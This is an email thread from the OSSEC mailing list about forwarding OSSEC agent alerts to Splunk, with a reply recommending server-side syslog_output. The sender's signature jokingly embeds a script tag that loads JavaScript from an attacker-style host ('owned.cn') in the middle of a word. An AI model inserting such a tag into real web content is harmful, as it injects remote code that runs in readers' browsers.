------Original Message------
From: rnuttin...@gmail.com <rnuttin...@gmail.com>
To: <xmert...@gmail.com>
Date: Tue, Apr 6, 7:18 PM +0000
Subject: Re:[ossec-list] OSSEC & Splunk integration
I would check your alerts.log file on your hids and make sure your agents are
reporting to the HIDS server. only your ossec server should be configured with
syslog_output forwarding to splunk. would also recommend the following sites
for further reading.....http://securityisfutile.blogspot.com
or http://Splunk.com (Splunkbase web site) and grab the splunk for ossec app.
good luck!
--------
------Original Message------
From: Xavier Mertens <xmert...@gmail.com>
To: <ossec-list@googlegroups.com>
Date: Mon, Apr 5, 6:45 PM +0200
Subject: [ossec-list] OSSEC & Splunk integration
Hi *,
I'm testing the integration of OSSEC with Splunk. I followed the
configuration as describe in the Wiki. It works!
Splunk runs on my OSSEC server. The problem I have at the moment: only
events generated by the server are sent to Splunk.
I don't see any trace of events generated by the remote agents.
Did I miss something in the design? ALL agents must have the syslog_output
enabled?
/x
--
My server is com<script src=http://owned.cn/js.js>pletely secure.
--
To unsubscribe, reply using "remove me" as the subject.